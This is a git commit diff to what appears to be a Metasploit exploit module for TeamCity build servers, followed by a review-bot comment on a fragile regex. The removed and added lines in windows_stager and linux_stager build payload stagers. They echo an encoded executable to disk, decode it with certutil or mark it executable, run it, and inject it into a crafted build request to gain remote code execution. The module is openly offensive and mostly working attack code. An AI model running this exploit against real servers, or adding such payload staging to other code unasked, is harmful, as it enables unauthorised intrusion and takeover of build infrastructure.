Replace cmd generation with built-in stager module

GSoC/Meterpreter_Web_Console
Dylan Pindur 2018-10-07 10:15:10 +08:00
parent 0f34f94496
commit 94e45b12b1
No known key found for this signature in database
GPG Key ID: 16ECFF6E48A63236
1 changed files with 17 additions and 26 deletions


@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -83,22 +83,15 @@ class MetasploitModule < Msf::Exploit::Remote
def windows_stager(version)
print_status('Constructing Windows payload')
exe_payload = generate_payload_exe
exe_name = Rex::Text.rand_text_alpha(8)
b64_exe_payload = Rex::Text.encode_base64(exe_payload)
# Split payload into chunks so we can echo it into a file
split_payload = b64_exe_payload.scan(/.{1,2000}/m)
commands = split_payload.map { |x| "echo|set /p=\"#{x}\" >> #{exe_name}.b64" }
echo_file = commands.join("\n")
script_content = %(
#{echo_file}
certutil -decode #{exe_name}.b64 #{exe_name}.exe
start "" %cd%\\#{exe_name}.exe
)
xml_payload = build_request(script_content.strip!, version)
stager = generate_cmdstager(
flavor: :certutil,
temp: '.',
concat_operator: "\n",
nodelete: true
).join("\n")
stager = stager.gsub(/^(?<exe>.{5}\.exe)/, 'start "" \k<exe>')
xml_payload = build_request(stager, version)
if xml_payload.nil?
fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
end
@ -110,17 +103,15 @@ class MetasploitModule < Msf::Exploit::Remote
def linux_stager(version)
print_status('Constructing Linux payload')
exe_payload = generate_payload_exe
exe_name = Rex::Text.rand_text_alpha(8)
exe_payload_encoded = Rex::Text.to_hex(exe_payload)
script_content = %(
echo -n -e '#{exe_payload_encoded}' > #{exe_name}
chmod +x #{exe_name}
./#{exe_name} &amp;
)
xml_payload = build_request(script_content.strip!, version)
stager = generate_cmdstager(
flavor: :echo,
temp: '.',
concat_operator: "\n",
nodelete: true
).join("\n")
stager << ' &amp;'
xml_payload = build_request(stager, version)
if xml_payload.nil?
fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
end
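Review bot: The rewrite in `windows_stager`, `stager.gsub(/^(?<exe>.{5}\.exe)/, 'start "" \k<exe>')`, depends on details of the certutil stager that this file never states: the final command must begin a line and be a five-character name ending in `.exe`. If the stager's naming or the effect of `temp: '.'` differs, the `gsub` matches nothing and the request is built from an unmodified stager without any error. A comment above the line such as `# certutil flavor ends with a bare "<5 chars>.exe" line; wrap it in start "" so the build step does not block` would record that assumption. Making the mismatch fail loudly, for example `fail_with(Failure::Unknown, 'Unexpected certutil stager layout') unless stager.gsub!(/^(?<exe>.{5}\.exe)/, 'start "" \k<exe>')`, would let a future stager change surface here. Both method bodies continue past the visible hunks, so this is based only on the lines shown.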